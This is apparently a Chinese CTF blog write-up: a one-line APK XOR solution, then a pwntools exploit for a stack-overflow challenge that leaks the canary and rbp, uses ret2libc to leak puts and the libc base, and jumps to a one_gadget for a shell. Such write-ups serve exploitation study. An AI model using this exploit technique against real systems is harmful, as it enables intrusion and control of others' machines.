一道很简单的apk题,反汇编出来,将两个数组的值一一异或就得到flag
这道简单的栈溢出题,开了canary保护
这里输入0x49个字节可以将canary和rbp打印出来
主函数有个栈溢出漏洞,这里ret2libc泄露puts的got表地址,再返回重新输入一次
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| from pwn import*
from LibcSearcher import *
p=process("./pwn")
context.log_level="debug"
libc=ELF('./libc-2.27.so')
pop_rdi=0x400853
puts_got=0x601018
call_puts=0x4007af
payload=b'a'*0x48+b'b'
puts_plt=0x400580
p.send(payload)
p.recvuntil('b')
canary=u64(p.recv(7).rjust(8,b'\x00'))
rbp_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(canary))
print('rbp'+hex(rbp_addr))
payload=b'b'*0x48+p64(canary)+p64(rbp_addr-0x50)
payload+=p64(pop_rdi)+p64(puts_got)+p64(call_puts)
gdb.attach(p)
sleep(1)
pause()
p.sendlineafter('overflow!',payload)
p.recvline()
puts=u64(p.recv(6).ljust(8,b'\x00'))
base=puts-libc.sym['puts']
system=base+libc.sym['system']
binsh=base+next(libc.search(b'bin/sh'))
print('puts'+hex(puts))
one=[0x4f3d5,0x4f432,0x10a41c]
one_gadget=base+one[0]
p.recvline()
payload=b'a'*0x48+p64(canary)+b'a'*8+p64(one_gadget)
p.sendline(payload)
p.interactive()
|
评论区
欢迎你留下宝贵的意见,昵称输入QQ号会显示QQ头像哦~